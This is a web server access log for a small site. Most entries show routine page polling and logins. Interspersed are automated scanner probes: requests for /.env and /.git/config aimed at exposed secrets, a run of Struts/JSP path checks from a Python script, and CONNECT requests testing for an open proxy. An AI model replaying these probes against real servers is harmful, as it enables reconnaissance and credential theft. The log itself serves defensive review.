178.115.42.220 - - [13/Nov/2024:18:23:38 +0100] "GET /entry.php?id=10271&&ser=518558 HTTP/1.1" 200 987 "http://hausegger.activities.at/entry.php?id=10271&&ser=518497" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:132.0) Gecko/20100101 Firefox/132.0"
178.115.42.220 - - [13/Nov/2024:18:23:38 +0100] "GET /gui/javascript/form_form.js?1731518618 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10271&&ser=518558" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:132.0) Gecko/20100101 Firefox/132.0"
178.115.42.220 - - [13/Nov/2024:18:23:45 +0100] "GET /entry.php?id=10271&&ser=518564 HTTP/1.1" 200 987 "http://hausegger.activities.at/entry.php?id=10271&&ser=518503" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Safari/537.36"
178.115.42.220 - - [13/Nov/2024:18:23:46 +0100] "GET /gui/javascript/form_form.js?1731518625 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10271&&ser=518564" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Safari/537.36"
178.115.42.220 - - [13/Nov/2024:18:24:38 +0100] "GET /entry.php?id=10271&&ser=518618 HTTP/1.1" 200 987 "http://hausegger.activities.at/entry.php?id=10271&&ser=518558" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:132.0) Gecko/20100101 Firefox/132.0"
178.115.42.220 - - [13/Nov/2024:18:24:38 +0100] "GET /gui/javascript/form_form.js?1731518678 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10271&&ser=518618" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:132.0) Gecko/20100101 Firefox/132.0"
178.115.42.220 - - [13/Nov/2024:18:24:46 +0100] "GET /entry.php?id=10271&&ser=518625 HTTP/1.1" 200 987 "http://hausegger.activities.at/entry.php?id=10271&&ser=518564" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Safari/537.36"
178.115.42.220 - - [13/Nov/2024:18:24:47 +0100] "GET /gui/javascript/form_form.js?1731518686 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10271&&ser=518625" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Safari/537.36"
178.115.42.220 - - [13/Nov/2024:18:25:38 +0100] "GET /entry.php?id=10271&&ser=518678 HTTP/1.1" 200 987 "http://hausegger.activities.at/entry.php?id=10271&&ser=518618" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:132.0) Gecko/20100101 Firefox/132.0"
178.115.42.220 - - [13/Nov/2024:18:25:39 +0100] "GET /gui/javascript/form_form.js?1731518739 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10271&&ser=518678" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:132.0) Gecko/20100101 Firefox/132.0"
178.115.42.220 - - [13/Nov/2024:18:25:47 +0100] "GET /entry.php?id=10271&&ser=518686 HTTP/1.1" 200 987 "http://hausegger.activities.at/entry.php?id=10271&&ser=518625" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Safari/537.36"
178.115.42.220 - - [13/Nov/2024:18:25:48 +0100] "GET /gui/javascript/form_form.js?1731518747 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10271&&ser=518686" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Safari/537.36"
141.98.11.178 - - [13/Nov/2024:18:26:21 +0100] "GET / HTTP/1.1" 200 274 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
178.115.42.220 - - [13/Nov/2024:18:26:39 +0100] "GET /entry.php?id=10271&&ser=518739 HTTP/1.1" 200 987 "http://hausegger.activities.at/entry.php?id=10271&&ser=518678" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:132.0) Gecko/20100101 Firefox/132.0"
178.115.42.220 - - [13/Nov/2024:18:26:39 +0100] "GET /gui/javascript/form_form.js?1731518799 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10271&&ser=518739" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:132.0) Gecko/20100101 Firefox/132.0"
178.115.42.220 - - [13/Nov/2024:18:26:48 +0100] "GET /entry.php?id=10271&&ser=518747 HTTP/1.1" 200 986 "http://hausegger.activities.at/entry.php?id=10271&&ser=518686" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Safari/537.36"
178.115.42.220 - - [13/Nov/2024:18:26:49 +0100] "GET /gui/javascript/form_form.js?1731518808 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10271&&ser=518747" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Safari/537.36"
87.120.113.56 - - [13/Nov/2024:18:27:09 +0100] "GET /.env HTTP/1.1" 404 280 "-" "Mozilla/5.0 (Windows NT 10.0; rv:45.9) Gecko/20100101 Goanna/3.2 Firefox/45.9 PaleMoon/27.4.0"
178.115.42.220 - - [13/Nov/2024:18:27:39 +0100] "GET /entry.php?id=10271&&ser=518799 HTTP/1.1" 200 986 "http://hausegger.activities.at/entry.php?id=10271&&ser=518739" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:132.0) Gecko/20100101 Firefox/132.0"
178.115.42.220 - - [13/Nov/2024:18:27:39 +0100] "GET /gui/javascript/form_form.js?1731518859 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10271&&ser=518799" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:132.0) Gecko/20100101 Firefox/132.0"
178.115.42.220 - - [13/Nov/2024:18:27:49 +0100] "GET /entry.php?id=10271&&ser=518808 HTTP/1.1" 200 986 "http://hausegger.activities.at/entry.php?id=10271&&ser=518747" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Safari/537.36"
178.115.42.220 - - [13/Nov/2024:18:27:50 +0100] "GET /gui/javascript/form_form.js?1731518869 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10271&&ser=518808" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Safari/537.36"
178.115.42.220 - - [13/Nov/2024:18:28:41 +0100] "GET /entry.php?id=10271&&ser=518859 HTTP/1.1" 200 986 "http://hausegger.activities.at/entry.php?id=10271&&ser=518799" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:132.0) Gecko/20100101 Firefox/132.0"
178.115.42.220 - - [13/Nov/2024:18:28:41 +0100] "GET /gui/javascript/form_form.js?1731518921 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10271&&ser=518859" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:132.0) Gecko/20100101 Firefox/132.0"
178.115.42.220 - - [13/Nov/2024:18:28:50 +0100] "GET /entry.php?id=10271&&ser=518869 HTTP/1.1" 200 987 "http://hausegger.activities.at/entry.php?id=10271&&ser=518808" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Safari/537.36"
178.115.42.220 - - [13/Nov/2024:18:28:51 +0100] "GET /gui/javascript/form_form.js?1731518930 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10271&&ser=518869" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Safari/537.36"
178.115.42.220 - - [13/Nov/2024:18:29:15 +0100] "GET /entry.php?id=10287&login=1 HTTP/1.1" 200 1880 "http://hausegger.activities.at/entry.php?id=10273&" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:132.0) Gecko/20100101 Firefox/132.0"
178.115.42.220 - - [13/Nov/2024:18:29:15 +0100] "GET /gui/javascript/form_form.js?1731518955 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10287&login=1" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:132.0) Gecko/20100101 Firefox/132.0"
178.115.42.220 - - [13/Nov/2024:18:29:25 +0100] "POST /entry.php?id=10287& HTTP/1.1" 200 2434 "http://hausegger.activities.at/entry.php?id=10287&login=1" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:132.0) Gecko/20100101 Firefox/132.0"
178.115.42.220 - - [13/Nov/2024:18:29:25 +0100] "GET /gui/javascript/form_form.js?1731518965 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10287&" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:132.0) Gecko/20100101 Firefox/132.0"
178.115.42.220 - - [13/Nov/2024:18:29:25 +0100] "GET /entry.php?id=10273&logout=true& HTTP/1.1" 200 1913 "http://hausegger.activities.at/entry.php?id=10287&" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:132.0) Gecko/20100101 Firefox/132.0"
178.115.42.220 - - [13/Nov/2024:18:29:25 +0100] "GET /entry.php?id=10270& HTTP/1.1" 200 909 "http://hausegger.activities.at/entry.php?id=10287&" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:132.0) Gecko/20100101 Firefox/132.0"
154.213.184.43 - - [13/Nov/2024:18:29:33 +0100] "GET / HTTP/1.1" 200 423 "-" "-"
178.115.42.220 - - [13/Nov/2024:18:29:51 +0100] "GET /entry.php?id=10271&&ser=518930 HTTP/1.1" 200 987 "http://hausegger.activities.at/entry.php?id=10271&&ser=518869" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Safari/537.36"
178.115.42.220 - - [13/Nov/2024:18:29:52 +0100] "GET /gui/javascript/form_form.js?1731518992 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10271&&ser=518930" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Safari/537.36"
219.138.127.218 - - [13/Nov/2024:18:30:30 +0100] "GET / HTTP/1.1" 200 274 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.87 Safari/537.36"
219.138.127.218 - - [13/Nov/2024:18:30:41 +0100] "GET /index.action HTTP/1.1" 404 285 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.87 Safari/537.36"
219.138.127.218 - - [13/Nov/2024:18:30:45 +0100] "GET /login.action HTTP/1.1" 404 285 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.87 Safari/537.36"
219.138.127.218 - - [13/Nov/2024:18:30:52 +0100] "GET /index.do HTTP/1.1" 404 283 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.87 Safari/537.36"
178.115.42.220 - - [13/Nov/2024:18:30:52 +0100] "GET /entry.php?id=10271&&ser=518992 HTTP/1.1" 200 987 "http://hausegger.activities.at/entry.php?id=10271&&ser=518930" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Safari/537.36"
178.115.42.220 - - [13/Nov/2024:18:30:53 +0100] "GET /gui/javascript/form_form.js?1731519052 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10271&&ser=518992" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Safari/537.36"
219.138.127.218 - - [13/Nov/2024:18:30:56 +0100] "GET /index.jsp HTTP/1.1" 404 284 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.87 Safari/537.36"
219.138.127.218 - - [13/Nov/2024:18:31:01 +0100] "GET /login.do HTTP/1.1" 404 283 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.87 Safari/537.36"
219.138.127.218 - - [13/Nov/2024:18:31:07 +0100] "GET /login.jsp HTTP/1.1" 404 284 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.87 Safari/537.36"
219.138.127.218 - - [13/Nov/2024:18:31:12 +0100] "GET /main.jsp HTTP/1.1" 404 283 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.87 Safari/537.36"
219.138.127.218 - - [13/Nov/2024:18:31:19 +0100] "GET /default.jsp HTTP/1.1" 404 285 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.87 Safari/537.36"
219.138.127.218 - - [13/Nov/2024:18:31:26 +0100] "GET /register.jsp HTTP/1.1" 404 285 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.87 Safari/537.36"
219.138.127.218 - - [13/Nov/2024:18:31:33 +0100] "GET /login/login.jsp HTTP/1.1" 404 286 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.87 Safari/537.36"
219.138.127.218 - - [13/Nov/2024:18:31:40 +0100] "GET /login/indexAction.action HTTP/1.1" 404 293 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.87 Safari/537.36"
219.138.127.218 - - [13/Nov/2024:18:31:46 +0100] "GET /indexAction.action HTTP/1.1" 404 287 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.87 Safari/537.36"
219.138.127.218 - - [13/Nov/2024:18:31:53 +0100] "POST / HTTP/1.1" 200 274 "-" "python-requests/2.27.1"
178.115.42.220 - - [13/Nov/2024:18:31:53 +0100] "GET /entry.php?id=10271&&ser=519052 HTTP/1.1" 200 987 "http://hausegger.activities.at/entry.php?id=10271&&ser=518992" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Safari/537.36"
178.115.42.220 - - [13/Nov/2024:18:31:54 +0100] "GET /gui/javascript/form_form.js?1731519114 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10271&&ser=519052" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Safari/537.36"
219.138.127.218 - - [13/Nov/2024:18:32:00 +0100] "POST /index.action HTTP/1.1" 404 285 "-" "python-requests/2.27.1"
219.138.127.218 - - [13/Nov/2024:18:32:06 +0100] "POST /login.action HTTP/1.1" 404 285 "-" "python-requests/2.27.1"
219.138.127.218 - - [13/Nov/2024:18:32:12 +0100] "POST /index.do HTTP/1.1" 404 283 "-" "python-requests/2.27.1"
87.120.113.56 - - [13/Nov/2024:18:32:16 +0100] "GET /.env HTTP/1.1" 404 280 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/72.0.3626.121 Safari/537.36"
219.138.127.218 - - [13/Nov/2024:18:32:18 +0100] "POST /index.jsp HTTP/1.1" 404 284 "-" "python-requests/2.27.1"
219.138.127.218 - - [13/Nov/2024:18:32:25 +0100] "POST /login.do HTTP/1.1" 404 283 "-" "python-requests/2.27.1"
219.138.127.218 - - [13/Nov/2024:18:32:31 +0100] "POST /login.jsp HTTP/1.1" 404 284 "-" "python-requests/2.27.1"
219.138.127.218 - - [13/Nov/2024:18:32:38 +0100] "POST /main.jsp HTTP/1.1" 404 283 "-" "python-requests/2.27.1"
219.138.127.218 - - [13/Nov/2024:18:32:44 +0100] "POST /default.jsp HTTP/1.1" 404 285 "-" "python-requests/2.27.1"
219.138.127.218 - - [13/Nov/2024:18:32:51 +0100] "POST /register.jsp HTTP/1.1" 404 285 "-" "python-requests/2.27.1"
178.115.42.220 - - [13/Nov/2024:18:32:54 +0100] "GET /entry.php?id=10271&&ser=519114 HTTP/1.1" 200 989 "http://hausegger.activities.at/entry.php?id=10271&&ser=519052" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Safari/537.36"
178.115.42.220 - - [13/Nov/2024:18:32:55 +0100] "GET /gui/javascript/form_form.js?1731519175 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10271&&ser=519114" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Safari/537.36"
219.138.127.218 - - [13/Nov/2024:18:32:58 +0100] "POST /login/login.jsp HTTP/1.1" 404 286 "-" "python-requests/2.27.1"
219.138.127.218 - - [13/Nov/2024:18:33:05 +0100] "POST /login/indexAction.action HTTP/1.1" 404 293 "-" "python-requests/2.27.1"
219.138.127.218 - - [13/Nov/2024:18:33:11 +0100] "POST /indexAction.action HTTP/1.1" 404 287 "-" "python-requests/2.27.1"
219.138.127.218 - - [13/Nov/2024:18:33:18 +0100] "POST / HTTP/1.1" 200 274 "-" "python-requests/2.27.1"
219.138.127.218 - - [13/Nov/2024:18:33:25 +0100] "POST /index.action HTTP/1.1" 404 285 "-" "python-requests/2.27.1"
219.138.127.218 - - [13/Nov/2024:18:33:31 +0100] "POST /login.action HTTP/1.1" 404 285 "-" "python-requests/2.27.1"
219.138.127.218 - - [13/Nov/2024:18:33:39 +0100] "POST /index.do HTTP/1.1" 404 283 "-" "python-requests/2.27.1"
219.138.127.218 - - [13/Nov/2024:18:33:44 +0100] "POST /index.jsp HTTP/1.1" 404 284 "-" "python-requests/2.27.1"
219.138.127.218 - - [13/Nov/2024:18:33:47 +0100] "POST /login.do HTTP/1.1" 404 283 "-" "python-requests/2.27.1"
219.138.127.218 - - [13/Nov/2024:18:33:51 +0100] "POST /login.jsp HTTP/1.1" 404 284 "-" "python-requests/2.27.1"
219.138.127.218 - - [13/Nov/2024:18:33:54 +0100] "POST /main.jsp HTTP/1.1" 404 283 "-" "python-requests/2.27.1"
178.115.42.220 - - [13/Nov/2024:18:33:55 +0100] "GET /entry.php?id=10271&&ser=519174 HTTP/1.1" 200 987 "http://hausegger.activities.at/entry.php?id=10271&&ser=519114" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Safari/537.36"
178.115.42.220 - - [13/Nov/2024:18:33:56 +0100] "GET /gui/javascript/form_form.js?1731519235 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10271&&ser=519174" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Safari/537.36"
219.138.127.218 - - [13/Nov/2024:18:33:58 +0100] "POST /default.jsp HTTP/1.1" 404 285 "-" "python-requests/2.27.1"
219.138.127.218 - - [13/Nov/2024:18:34:01 +0100] "POST /register.jsp HTTP/1.1" 404 285 "-" "python-requests/2.27.1"
219.138.127.218 - - [13/Nov/2024:18:34:05 +0100] "POST /login/login.jsp HTTP/1.1" 404 286 "-" "python-requests/2.27.1"
219.138.127.218 - - [13/Nov/2024:18:34:08 +0100] "POST /login/indexAction.action HTTP/1.1" 404 293 "-" "python-requests/2.27.1"
219.138.127.218 - - [13/Nov/2024:18:34:11 +0100] "POST /indexAction.action HTTP/1.1" 404 287 "-" "python-requests/2.27.1"
178.115.42.220 - - [13/Nov/2024:18:34:56 +0100] "GET /entry.php?id=10271&&ser=519235 HTTP/1.1" 200 987 "http://hausegger.activities.at/entry.php?id=10271&&ser=519174" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Safari/537.36"
178.115.42.220 - - [13/Nov/2024:18:34:57 +0100] "GET /gui/javascript/form_form.js?1731519297 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10271&&ser=519235" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Safari/537.36"
87.120.115.119 - - [13/Nov/2024:18:35:03 +0100] "GET /.git/config HTTP/1.1" 404 285 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_5) AppleWebKit/537.78.1 (KHTML like Gecko) Version/7.0.6 Safari/537.78.1"
178.115.42.220 - - [13/Nov/2024:18:35:57 +0100] "GET /entry.php?id=10271&&ser=519297 HTTP/1.1" 200 988 "http://hausegger.activities.at/entry.php?id=10271&&ser=519235" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Safari/537.36"
178.115.42.220 - - [13/Nov/2024:18:35:58 +0100] "GET /gui/javascript/form_form.js?1731519357 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10271&&ser=519297" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Safari/537.36"
141.98.7.248 - - [13/Nov/2024:18:36:49 +0100] "CONNECT 1.1.1.1:443 HTTP/1.1" 200 423 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36"
141.98.7.248 - - [13/Nov/2024:18:36:49 +0100] "CONNECT 1.1.1.1:443 HTTP/1.1" 200 423 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36"
141.98.7.248 - - [13/Nov/2024:18:36:51 +0100] "CONNECT 1.1.1.1:443 HTTP/1.1" 200 423 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36"
178.115.42.220 - - [13/Nov/2024:18:36:58 +0100] "GET /entry.php?id=10271&&ser=519357 HTTP/1.1" 200 986 "http://hausegger.activities.at/entry.php?id=10271&&ser=519297" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Safari/537.36"
178.115.42.220 - - [13/Nov/2024:18:36:59 +0100] "GET /gui/javascript/form_form.js?1731519418 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10271&&ser=519357" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Safari/537.36"
178.115.42.220 - - [13/Nov/2024:18:37:59 +0100] "GET /entry.php?id=10271&&ser=519418 HTTP/1.1" 200 986 "http://hausegger.activities.at/entry.php?id=10271&&ser=519357" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Safari/537.36"
178.115.42.220 - - [13/Nov/2024:18:38:00 +0100] "GET /gui/javascript/form_form.js?1731519479 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10271&&ser=519418" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Safari/537.36"
178.115.42.220 - - [13/Nov/2024:18:39:00 +0100] "GET /entry.php?id=10271&&ser=519479 HTTP/1.1" 200 987 "http://hausegger.activities.at/entry.php?id=10271&&ser=519418" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Safari/537.36"
178.115.42.220 - - [13/Nov/2024:18:39:01 +0100] "GET /gui/javascript/form_form.js?1731519540 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10271&&ser=519479" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Safari/537.36"
178.115.42.220 - - [13/Nov/2024:18:40:01 +0100] "GET /entry.php?id=10271&&ser=519540 HTTP/1.1" 200 989 "http://hausegger.activities.at/entry.php?id=10271&&ser=519479" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Safari/537.36"
178.115.42.220 - - [13/Nov/2024:18:40:02 +0100] "GET /gui/javascript/form_form.js?1731519602 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10271&&ser=519540" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Safari/537.36"
178.115.42.220 - - [13/Nov/2024:18:41:02 +0100] "GET /entry.php?id=10271&&ser=519601 HTTP/1.1" 200 987 "http://hausegger.activities.at/entry.php?id=10271&&ser=519540" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Safari/537.36"
178.115.42.220 - - [13/Nov/2024:18:41:03 +0100] "GET /gui/javascript/form_form.js?1731519663 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10271&&ser=519601" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Safari/537.36"
178.115.42.220 - - [13/Nov/2024:18:42:03 +0100] "GET /entry.php?id=10271&&ser=519663 HTTP/1.1" 200 987 "http://hausegger.activities.at/entry.php?id=10271&&ser=519601" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Safari/537.36"
178.115.42.220 - - [13/Nov/2024:18:42:04 +0100] "GET /gui/javascript/form_form.js?1731519724 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10271&&ser=519663" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Safari/537.36"
178.115.42.220 - - [13/Nov/2024:18:43:04 +0100] "GET /entry.php?id=10271&&ser=519724 HTTP/1.1" 200 987 "http://hausegger.activities.at/entry.php?id=10271&&ser=519663" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Safari/537.36"
178.115.42.220 - - [13/Nov/2024:18:43:05 +0100] "GET /gui/javascript/form_form.js?1731519784 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10271&&ser=519724" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Safari/537.36"
178.115.42.220 - - [13/Nov/2024:18:43:46 +0100] "GET /entry.php?id=10287&login=1 HTTP/1.1" 200 1878 "http://hausegger.activities.at/entry.php?id=10273&" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Safari/537.36"
178.115.42.220 - - [13/Nov/2024:18:43:46 +0100] "GET /gui/javascript/form_form.js?1731519826 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10287&login=1" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Safari/537.36"
178.115.42.220 - - [13/Nov/2024:18:43:48 +0100] "POST /entry.php?id=10287& HTTP/1.1" 200 2433 "http://hausegger.activities.at/entry.php?id=10287&login=1" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Safari/537.36"
178.115.42.220 - - [13/Nov/2024:18:43:48 +0100] "GET /gui/javascript/form_form.js?1731519828 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10287&" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Safari/537.36"
178.115.42.220 - - [13/Nov/2024:18:43:48 +0100] "GET /entry.php?id=10270& HTTP/1.1" 200 909 "http://hausegger.activities.at/entry.php?id=10287&" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Safari/537.36"
